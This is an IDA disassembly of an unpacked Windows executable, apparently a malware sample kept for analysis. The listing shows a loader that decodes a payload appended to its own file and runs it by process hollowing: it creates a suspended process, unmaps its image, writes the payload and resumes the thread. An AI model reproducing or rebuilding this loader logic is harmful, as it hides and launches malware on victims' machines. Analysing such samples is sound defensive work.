;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : C2D569A718680039906CC811809D18E5
; File Name : u:\work\c2d569a718680039906cc811809d18e5_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00006EE2 ( 28386.)
; Section size in file : 00006EE2 ( 28386.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401000(FILE *File,int,int,int,int)
sub_401000 proc near ; CODE XREF: WinMain(x,x,x,x)+5E�p
var_13C = byte ptr -13Ch
Dst = word ptr -5Ch
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_16 = word ptr -16h
var_8 = word ptr -8
var_4 = dword ptr -4
File = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
mov ebx, [ebp+File]
push edi
push 2 ; Origin
push 0 ; Offset
push ebx ; File
call _fseek
push ebx ; File
call _ftell
mov edi, eax
mov eax, Offset
push 0 ; Origin
push eax ; Offset
push ebx ; File
sub edi, eax
call _fseek
add esp, 1Ch
cmp edi, 40h
jnb short loc_40103F
xor al, al
jmp loc_4011AF
; ---------------------------------------------------------------------------
loc_40103F: ; CODE XREF: sub_401000+36�j
push esi
push ebx ; File
push 1 ; Count
push 40h ; ElementSize
mov esi, offset byte_40A6E0
push esi ; DstBuf
call _fread
add esp, 10h
xor ecx, ecx
loc_401055: ; CODE XREF: sub_401000+67�j
lea eax, dword_40A6E1[ecx]
add byte ptr [eax-1], 0E1h
add byte ptr [eax], 1Fh
inc ecx
inc ecx
cmp ecx, 40h
jb short loc_401055
push 40h ; Size
lea eax, [ebp+Dst]
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
cmp [ebp+Dst], 5A4Dh
jz short loc_401087
loc_401080: ; CODE XREF: sub_401000+A7�j
; sub_401000+F6�j
xor al, al
jmp loc_4011AE
; ---------------------------------------------------------------------------
loc_401087: ; CODE XREF: sub_401000+7E�j
push offset aOffsetToPeHead ; "Offset to PE Header = \n"
call _printf
mov eax, [ebp+var_20]
pop ecx
lea ecx, [eax+18h]
cmp edi, ecx
jnb short loc_4010A9
push offset aFileSizeTooSma ; "File size too small\n"
call _printf
pop ecx
jmp short loc_401080
; ---------------------------------------------------------------------------
loc_4010A9: ; CODE XREF: sub_401000+9A�j
mov ecx, Offset
push 0 ; Origin
add ecx, eax
push ecx ; Offset
push ebx ; File
call _fseek
push ebx ; File
push 1 ; Count
push 18h ; ElementSize
push esi ; DstBuf
call _fread
add esp, 1Ch
xor ecx, ecx
loc_4010CA: ; CODE XREF: sub_401000+DC�j
lea eax, dword_40A6E1[ecx]
add byte ptr [eax-1], 0E1h
add byte ptr [eax], 1Fh
inc ecx
inc ecx
cmp ecx, 18h
jb short loc_4010CA
push 18h ; Size
lea eax, [ebp+var_1C]
push esi ; Src
push eax ; Dst
call _memcpy
mov edi, 0E0h
add esp, 0Ch
cmp [ebp+var_8], di
jnz short loc_401080
push ebx ; File
push 1 ; Count
push edi ; ElementSize
push esi ; DstBuf
call _fread
add esp, 10h
xor ecx, ecx
loc_401107: ; CODE XREF: sub_401000+118�j
lea eax, dword_40A6E1[ecx]
add byte ptr [eax-1], 0E1h
add byte ptr [eax], 1Fh
inc ecx
inc ecx
cmp ecx, edi
jb short loc_401107
push edi ; Size
lea eax, [ebp+var_13C]
push esi ; Src
push eax ; Dst
call _memcpy
movzx eax, [ebp+var_16]
lea eax, [eax+eax*4]
shl eax, 3
push eax ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
mov [ebp+var_4], eax
movzx eax, [ebp+var_16]
push ebx ; File
lea eax, [eax+eax*4]
push 1 ; Count
shl eax, 3
push eax ; ElementSize
push esi ; DstBuf
call _fread
movzx eax, [ebp+var_16]
lea eax, [eax+eax*4]
add esp, 20h
xor edx, edx
shl eax, 3
jz short loc_401173
loc_401160: ; CODE XREF: sub_401000+171�j
lea ecx, dword_40A6E1[edx]
add byte ptr [ecx-1], 0E1h
add byte ptr [ecx], 1Fh
inc edx
inc edx
cmp edx, eax
jb short loc_401160
loc_401173: ; CODE XREF: sub_401000+15E�j
push eax ; Size
push esi ; Src
push [ebp+var_4] ; Dst
call _memcpy
mov edi, [ebp+arg_4]
mov eax, [ebp+arg_10]
add esp, 0Ch
push 10h
pop ecx
push 6
lea esi, [ebp+Dst]
rep movsd
mov edi, [ebp+arg_8]
pop ecx
lea esi, [ebp+var_1C]
rep movsd
mov edi, [ebp+arg_C]
push 38h
pop ecx
lea esi, [ebp+var_13C]
rep movsd
mov ecx, [ebp+var_4]
mov [eax], ecx
mov al, 1
loc_4011AE: ; CODE XREF: sub_401000+82�j
pop esi
loc_4011AF: ; CODE XREF: sub_401000+3A�j
pop edi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4011B3 proc near ; CODE XREF: WinMain(x,x,x,x)+7E�p
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [eax+3Ch]
push esi
mov esi, [eax+20h]
xor edx, edx
mov eax, ecx
div esi
test edx, edx
jz short loc_4011D0
lea ecx, [eax+1]
imul ecx, esi
loc_4011D0: ; CODE XREF: sub_4011B3+15�j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
test eax, eax
jle short loc_40120A
push ebx
mov ebx, [ebp+arg_C]
push edi
add ebx, 8
mov [ebp+arg_8], eax
loc_4011E6: ; CODE XREF: sub_4011B3+53�j
mov edi, [ebx]
test edi, edi
jz short loc_401200
xor edx, edx
mov eax, edi
div esi
test edx, edx
jnz short loc_4011FA
add ecx, edi
jmp short loc_401200
; ---------------------------------------------------------------------------
loc_4011FA: ; CODE XREF: sub_4011B3+41�j
inc eax
imul eax, esi
add ecx, eax
loc_401200: ; CODE XREF: sub_4011B3+37�j
; sub_4011B3+45�j
add ebx, 28h
dec [ebp+arg_8]
jnz short loc_4011E6
pop edi
pop ebx
loc_40120A: ; CODE XREF: sub_4011B3+26�j
mov eax, ecx
pop esi
pop ebp
retn
sub_4011B3 endp
; =============== S U B R O U T I N E =======================================
sub_40120F proc near ; CODE XREF: sub_401229+8B�p
; sub_401229:loc_401323�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor edx, edx
div [esp+arg_4]
test edx, edx
jnz short loc_401222
mov eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_401222: ; CODE XREF: sub_40120F+C�j
inc eax
imul eax, [esp+arg_4]
retn
sub_40120F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401229(FILE *File,int,int,int,int,void *Count)
sub_401229 proc near ; CODE XREF: WinMain(x,x,x,x)+B2�p
File = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
Count = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
push 0 ; Origin
push Offset ; Offset
push [ebp+File] ; File
call _fseek
mov eax, [ebp+arg_8]
movzx eax, word ptr [eax+6]
mov ebx, [ebp+arg_C]
mov esi, [ebx+3Ch]
add esp, 0Ch
test eax, eax
jle short loc_401267
mov ecx, [ebp+arg_10]
add ecx, 14h
loc_401259: ; CODE XREF: sub_401229+3C�j
mov edx, [ecx]
cmp edx, esi
jnb short loc_401261
mov esi, edx
loc_401261: ; CODE XREF: sub_401229+34�j
add ecx, 28h
dec eax
jnz short loc_401259
loc_401267: ; CODE XREF: sub_401229+28�j
push [ebp+File] ; File
mov edi, offset byte_40A6E0
push esi ; Count
push 1 ; ElementSize
push edi ; DstBuf
call _fread
add esp, 10h
xor ecx, ecx
test esi, esi
mov [ebp+arg_C], eax
jbe short loc_401297
loc_401284: ; CODE XREF: sub_401229+6C�j
lea eax, dword_40A6E1[ecx]
add byte ptr [eax-1], 0E1h
add byte ptr [eax], 1Fh
inc ecx
inc ecx
cmp ecx, esi
jb short loc_401284
loc_401297: ; CODE XREF: sub_401229+59�j
push esi ; Size
push edi ; Src
push [ebp+Count] ; Dst
call _memcpy
add esp, 0Ch
cmp [ebp+arg_C], esi
jnz loc_401346
mov ecx, [ebx+20h]
push ecx
push dword ptr [ebx+3Ch]
call sub_40120F
and [ebp+arg_C], 0
mov edi, eax
mov eax, [ebp+arg_8]
add edi, [ebp+Count]
add esp, 8
cmp word ptr [eax+6], 0
jbe short loc_40133F
mov esi, [ebp+arg_10]
add esi, 8
loc_4012D5: ; CODE XREF: sub_401229+114�j
mov eax, [esi+8]
test eax, eax
jbe short loc_40131B
mov [ebp+Count], eax
mov eax, [esi]
cmp [ebp+Count], eax
jbe short loc_4012E9
mov [ebp+Count], eax
loc_4012E9: ; CODE XREF: sub_401229+BB�j
mov eax, [esi+0Ch]
add eax, Offset
push 0 ; Origin
push eax ; Offset
push [ebp+File] ; File
call _fseek
push [ebp+File] ; File
push [ebp+Count] ; Count
push 1 ; ElementSize
push edi ; DstBuf
call _fread
add esp, 1Ch
cmp eax, [ebp+Count]
jnz short loc_401346
mov ecx, [ebx+20h]
push ecx
push dword ptr [esi]
jmp short loc_401323
; ---------------------------------------------------------------------------
loc_40131B: ; CODE XREF: sub_401229+B1�j
mov eax, [esi]
test eax, eax
jz short loc_40132D
push ecx
push eax
loc_401323: ; CODE XREF: sub_401229+F0�j
call sub_40120F
add esp, 8
add edi, eax
loc_40132D: ; CODE XREF: sub_401229+F6�j
mov eax, [ebp+arg_8]
movzx eax, word ptr [eax+6]
inc [ebp+arg_C]
add esi, 28h
cmp [ebp+arg_C], eax
jl short loc_4012D5
loc_40133F: ; CODE XREF: sub_401229+A4�j
mov al, 1
loc_401341: ; CODE XREF: sub_401229+11F�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_401346: ; CODE XREF: sub_401229+7E�j
; sub_401229+E8�j
xor al, al
jmp short loc_401341
sub_401229 endp
; =============== S U B R O U T I N E =======================================
sub_40134A proc near ; CODE XREF: sub_40148D+D4�p
arg_8 = dword ptr 0Ch
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov eax, [esp+arg_8]
mov ecx, [eax+88h]
test ecx, ecx
jz short locret_4013B8
cmp dword ptr [eax+8Ch], 0
jz short locret_4013B8
mov edx, [esp+arg_10]
push esi
mov esi, [esp+4+arg_14]
sub esi, [eax+1Ch]
add ecx, edx
cmp dword ptr [ecx+4], 0
jz short loc_4013B7
push ebx
push edi
loc_401377: ; CODE XREF: sub_40134A+69�j
mov eax, [ecx+4]
sub eax, 8
shr eax, 1
test eax, eax
lea edi, [ecx+8]
jle short loc_4013AD
mov ebx, eax
loc_401388: ; CODE XREF: sub_40134A+61�j
xor edx, edx
mov dx, [edi]
mov eax, edx
and eax, 0FFFh
add eax, [ecx]
and dx, 0F000h
add eax, [esp+0Ch+arg_10]
cmp dx, 3000h
jnz short loc_4013A8
add [eax], esi
loc_4013A8: ; CODE XREF: sub_40134A+5A�j
inc edi
inc edi
dec ebx
jnz short loc_401388
loc_4013AD: ; CODE XREF: sub_40134A+3A�j
cmp dword ptr [edi+4], 0
mov ecx, edi
jnz short loc_401377
pop edi
pop ebx
loc_4013B7: ; CODE XREF: sub_40134A+29�j
pop esi
locret_4013B8: ; CODE XREF: sub_40134A+C�j
; sub_40134A+15�j
retn
sub_40134A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4013B9 proc near ; CODE XREF: sub_40148D+18�p
var_168 = byte ptr -168h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_20 = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 168h
push ebx
push esi
push edi
push 10h
pop ecx
xor ebx, ebx
xor eax, eax
mov [ebp+var_64], ebx
lea edi, [ebp+var_60]
rep stosd
push 104h
lea eax, [ebp+var_168]
push eax
push ebx
call ds:dword_408010 ; GetModuleFileNameA
mov esi, [ebp+arg_0]
push esi
lea eax, [ebp+var_64]
push eax
push ebx
push ebx
push 4
push ebx
push ebx
push ebx
lea eax, [ebp+var_168]
push eax
push ebx
call ds:dword_40800C ; CreateProcessA
test eax, eax
jz short loc_401469
mov edi, [ebp+arg_4]
push edi
mov dword ptr [edi], 10007h
push dword ptr [esi+4]
call ds:dword_408008 ; GetThreadContext
mov ebx, [ebp+arg_8]
lea eax, [ebp+var_4]
push eax
mov eax, [edi+0A4h]
push 4
push ebx
add eax, 8
push eax
push dword ptr [esi]
call ds:dword_408004 ; ReadProcessMemory
mov edi, [ebx]
mov ebx, ds:dword_408000
jmp short loc_40144D
; ---------------------------------------------------------------------------
loc_401441: ; CODE XREF: sub_4013B9+A1�j
cmp [ebp+var_10], 10000h
jz short loc_40145C
add edi, [ebp+var_14]
loc_40144D: ; CODE XREF: sub_4013B9+86�j
push 1Ch
lea eax, [ebp+var_20]
push eax
push edi
push dword ptr [esi]
call ebx ; VirtualQueryEx
test eax, eax
jnz short loc_401441
loc_40145C: ; CODE XREF: sub_4013B9+8F�j
mov eax, [ebp+arg_8]
sub edi, [eax]
mov [eax+4], edi
xor eax, eax
inc eax
jmp short loc_40146B
; ---------------------------------------------------------------------------
loc_401469: ; CODE XREF: sub_4013B9+4D�j
xor eax, eax
loc_40146B: ; CODE XREF: sub_4013B9+AE�j
pop edi
pop esi
pop ebx
leave
retn
sub_4013B9 endp
; =============== S U B R O U T I N E =======================================
sub_401470 proc near ; CODE XREF: sub_40148D+9E�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp dword ptr [eax+88h], 0
jz short loc_40148A
cmp dword ptr [eax+8Ch], 0
jz short loc_40148A
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40148A: ; CODE XREF: sub_401470+B�j
; sub_401470+14�j
xor eax, eax
retn
sub_401470 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40148D proc near ; CODE XREF: WinMain(x,x,x,x)+D1�p
var_2EC = dword ptr -2ECh
var_248 = dword ptr -248h
var_23C = dword ptr -23Ch
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 2ECh
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_2EC]
push eax
lea eax, [ebp+var_14]
push eax
call sub_4013B9
add esp, 0Ch
test eax, eax
jz locret_40161A
mov eax, [ebp+var_1C]
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_8]
cmp [ebx+1Ch], eax
push esi
mov esi, ds:dword_408030
push edi
mov edi, 3000h
jnz short loc_4014F0
mov ecx, [ebp+var_18]
cmp [ebp+arg_14], ecx
ja short loc_4014F0
lea edx, [ebp+var_20]
push edx
push 40h
push ecx
push eax
push [ebp+var_14]
mov [ebp+var_4], eax
call ds:dword_40802C ; VirtualProtectEx
jmp short loc_401524
; ---------------------------------------------------------------------------
loc_4014F0: ; CODE XREF: sub_40148D+43�j
; sub_40148D+4B�j
push offset aZwunmapviewofs ; "ZwUnmapViewOfSection"
push offset aNtdll_dll ; "ntdll.dll"
call ds:dword_408028 ; GetModuleHandleA
push eax
call ds:dword_408024 ; GetProcAddress
push [ebp+var_1C]
push [ebp+var_14]
call eax
test eax, eax
jnz short loc_401524
push 40h
push edi
push [ebp+arg_14]
push dword ptr [ebx+1Ch]
push [ebp+var_14]
call esi ; VirtualAllocEx
mov [ebp+var_4], eax
loc_401524: ; CODE XREF: sub_40148D+61�j
; sub_40148D+84�j
cmp [ebp+var_4], 0
jnz short loc_401573
push ebx
call sub_401470
add esp, 4
test eax, eax
jz loc_401601
push 40h
push edi
push [ebp+arg_14]
push 0
push [ebp+var_14]
call esi ; VirtualAllocEx
test eax, eax
mov [ebp+var_4], eax
jz loc_401601
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40134A
add esp, 18h
cmp [ebp+var_4], 0
jz loc_401601
loc_401573: ; CODE XREF: sub_40148D+9B�j
mov esi, ds:dword_408020
lea eax, [ebp+var_20]
push eax
push 4
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_248]
add eax, 8
push eax
push [ebp+var_14]
call esi ; WriteProcessMemory
mov eax, [ebp+arg_0]
mov ecx, [eax+3Ch]
mov eax, [ebp+arg_10]
mov edx, [ebp+var_4]
push 0
push [ebp+arg_14]
mov [ecx+eax+34h], edx
push eax
push [ebp+var_4]
push [ebp+var_14]
call esi ; WriteProcessMemory
test eax, eax
jz short loc_4015FA
mov eax, [ebp+var_4]
cmp eax, [ebp+var_1C]
mov [ebp+var_2EC], 10007h
jz short loc_4015D3
mov ecx, [ebx+10h]
add ecx, eax
mov [ebp+var_23C], ecx
jmp short loc_4015DF
; ---------------------------------------------------------------------------
loc_4015D3: ; CODE XREF: sub_40148D+137�j
mov eax, [ebx+10h]
add eax, [ebx+1Ch]
mov [ebp+var_23C], eax
loc_4015DF: ; CODE XREF: sub_40148D+144�j
lea eax, [ebp+var_2EC]
push eax
push [ebp+var_10]
call ds:dword_40801C ; SetThreadContext
push [ebp+var_10]
call ds:dword_408018 ; ResumeThread
jmp short loc_401617
; ---------------------------------------------------------------------------
loc_4015FA: ; CODE XREF: sub_40148D+125�j
push offset aWriteprocessme ; "WriteProcessMemory failed\n"
jmp short loc_401606
; ---------------------------------------------------------------------------
loc_401601: ; CODE XREF: sub_40148D+A8�j
; sub_40148D+C0�j ...
push offset aLoadFailed_Con ; "Load failed. Consider making this EXE "...
loc_401606: ; CODE XREF: sub_40148D+172�j
call _printf
pop ecx
push 0
push [ebp+var_14]
call ds:dword_408014 ; TerminateProcess
loc_401617: ; CODE XREF: sub_40148D+16B�j
pop edi
pop esi
pop ebx
locret_40161A: ; CODE XREF: sub_40148D+22�j
leave
retn
sub_40148D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+186�p
var_330 = byte ptr -330h
var_13C = dword ptr -13Ch
var_5C = dword ptr -5Ch
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
lpCmdLine = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 330h
push ebx
push 1F4h
lea eax, [ebp+var_330]
push eax
push 0
call ds:dword_408010 ; GetModuleFileNameA
push 6
lea eax, [ebp+var_330]
push eax
call ds:dword_408038 ; SetFileAttributesA
lea eax, [ebp+var_330]
push offset aRb ; "rb"
push eax ; char *
call _fopen
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_4016F7
lea eax, [ebp+var_4]
push eax ; int
lea eax, [ebp+var_13C]
push eax ; int
lea eax, [ebp+var_1C]
push eax ; int
lea eax, [ebp+var_5C]
push eax ; int
push ebx ; File
call sub_401000
add esp, 14h
test al, al
jz short loc_4016F7
push esi
push edi
push [ebp+var_4]
lea eax, [ebp+var_13C]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_5C]
push eax
call sub_4011B3
add esp, 10h
push 40h
push 1000h
mov edi, eax
push edi
push 0
call ds:dword_408034 ; VirtualAlloc
mov esi, eax
test esi, esi
jz short loc_4016F5
push esi ; Count
push [ebp+var_4] ; int
lea eax, [ebp+var_13C]
push eax ; int
lea eax, [ebp+var_1C]
push eax ; int
lea eax, [ebp+var_5C]
push eax ; int
push ebx ; File
call sub_401229
push ebx ; File
call _fclose
push edi
push esi
push [ebp+var_4]
lea eax, [ebp+var_13C]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_5C]
push eax
call sub_40148D
add esp, 34h
loc_4016F5: ; CODE XREF: WinMain(x,x,x,x)+9C�j
pop edi
pop esi
loc_4016F7: ; CODE XREF: WinMain(x,x,x,x)+44�j
; WinMain(x,x,x,x)+68�j
xor eax, eax
pop ebx
leave
retn 10h
_WinMain@16 endp
; [0000000E BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION _printf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
; [000000E9 BYTES: COLLAPSED FUNCTION _fread. PRESS KEYPAD "+" TO EXPAND]
; [00000159 BYTES: COLLAPSED FUNCTION _ftell. PRESS KEYPAD "+" TO EXPAND]
; [0000008E BYTES: COLLAPSED FUNCTION _fseek. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION _fclose. PRESS KEYPAD "+" TO EXPAND]
; [0000002A BYTES: COLLAPSED FUNCTION __fsopen. PRESS KEYPAD "+" TO EXPAND]
; [00000013 BYTES: COLLAPSED FUNCTION _fopen. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
_fast_error_exit:
cmp dword_40AEEC, 1
jnz short loc_401E13
call __FF_MSGBANNER
loc_401E13: ; CODE XREF: .text:00401E0C�j
push dword ptr [esp+4]
call __NMSG_WRITE
push 0FFh
call unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
_check_managed_app:
push 0
call ds:dword_408028 ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_401E57
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_401E57
movzx eax, word ptr [ecx+18h]
cmp eax, 10Bh
jz short loc_401E6D
cmp eax, 20Bh
jz short loc_401E5A
loc_401E57: ; CODE XREF: .text:00401E36�j
; .text:00401E43�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_401E5A: ; CODE XREF: .text:00401E55�j
xor eax, eax
cmp dword ptr [ecx+84h], 0Eh
jbe short locret_401E7E
cmp [ecx+0F8h], eax
jmp short loc_401E7B
; ---------------------------------------------------------------------------
loc_401E6D: ; CODE XREF: .text:00401E4E�j
xor eax, eax
cmp dword ptr [ecx+74h], 0Eh
jbe short locret_401E7E
cmp [ecx+0E8h], eax
loc_401E7B: ; CODE XREF: .text:00401E6B�j
setnz al
locret_401E7E: ; CODE XREF: .text:00401E63�j
; .text:00401E73�j
retn
; [000001DC BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; [00000046 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000088 BYTES: COLLAPSED FUNCTION __stbuf. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __ftbuf. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _write_char. PRESS KEYPAD "+" TO EXPAND]
; [00000024 BYTES: COLLAPSED FUNCTION _write_multi_char. PRESS KEYPAD "+" TO EXPAND]
; [00000037 BYTES: COLLAPSED FUNCTION _write_string. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
_get_int_arg:
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
; ---------------------------------------------------------------------------
_get_int64_arg:
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
; ---------------------------------------------------------------------------
_get_short_arg:
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
; [000007DA BYTES: COLLAPSED FUNCTION __output. PRESS KEYPAD "+" TO EXPAND]
off_402A2A dd offset loc_40246C ; DATA XREF: __output+85�r
dd offset loc_4022DC ; jump table for switch statement
dd offset loc_4022F9
dd offset loc_402345
dd offset loc_402386
dd offset loc_40238F
dd offset loc_4023CD
dd offset loc_4024AE
; ---------------------------------------------------------------------------
mov eax, offset off_40A060
retn
; [000000A6 BYTES: COLLAPSED FUNCTION ___initstdio. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION ___endstdio. PRESS KEYPAD "+" TO EXPAND]
; [000000DE BYTES: COLLAPSED FUNCTION __filbuf. PRESS KEYPAD "+" TO EXPAND]
; [000001EE BYTES: COLLAPSED FUNCTION __read. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__initterm_e:
push esi
mov esi, eax
xor eax, eax
jmp short loc_402E34
; ---------------------------------------------------------------------------
loc_402E25: ; CODE XREF: .text:00402E38�j
test eax, eax
jnz short loc_402E3A
mov ecx, [esi]
test ecx, ecx
jz short loc_402E31
call ecx
loc_402E31: ; CODE XREF: .text:00402E2D�j
add esi, 4
loc_402E34: ; CODE XREF: .text:00402E23�j
cmp esi, [esp+8]
jb short loc_402E25
loc_402E3A: ; CODE XREF: .text:00402E27�j
pop esi
retn
; [0000006A BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [000000C1 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __cexit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __c_exit. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__ioterm:
push esi
mov esi, offset dword_40B380
loc_403158: ; CODE XREF: .text:00403171�j
mov eax, [esi]
test eax, eax
jz short loc_403168
push eax
call _free
and dword ptr [esi], 0
pop ecx
loc_403168: ; CODE XREF: .text:0040315C�j
add esi, 4
cmp esi, offset dword_40B480
jl short loc_403158
pop esi
retn
; [0000008C BYTES: COLLAPSED FUNCTION __lseek. PRESS KEYPAD "+" TO EXPAND]
; [0000005D BYTES: COLLAPSED FUNCTION __flush. PRESS KEYPAD "+" TO EXPAND]
; [0000003B BYTES: COLLAPSED FUNCTION _fflush. PRESS KEYPAD "+" TO EXPAND]
; [0000006D BYTES: COLLAPSED FUNCTION _flsall. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_403306 proc near ; CODE XREF: ___endstdio�p
push 1
call _flsall
pop ecx
retn
sub_403306 endp
; [00000038 BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [000000B3 BYTES: COLLAPSED FUNCTION __close. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION __freebuf. PRESS KEYPAD "+" TO EXPAND]
; [00000168 BYTES: COLLAPSED FUNCTION __openfile. PRESS KEYPAD "+" TO EXPAND]
; [00000072 BYTES: COLLAPSED FUNCTION __getstream. PRESS KEYPAD "+" TO EXPAND]
; [00000177 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__GET_RTERRMSG:
mov ecx, [esp+4]
xor eax, eax
loc_40377C: ; CODE XREF: .text:00403789�j
cmp ecx, dword_40A2E8[eax*8]
jz short loc_40378B
inc eax
cmp eax, 13h
jb short loc_40377C
loc_40378B: ; CODE XREF: .text:00403783�j
shl eax, 3
cmp ecx, dword_40A2E8[eax]
jnz short loc_40379D
mov eax, off_40A2EC[eax]
retn
; ---------------------------------------------------------------------------
loc_40379D: ; CODE XREF: .text:00403794�j
xor eax, eax
retn
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
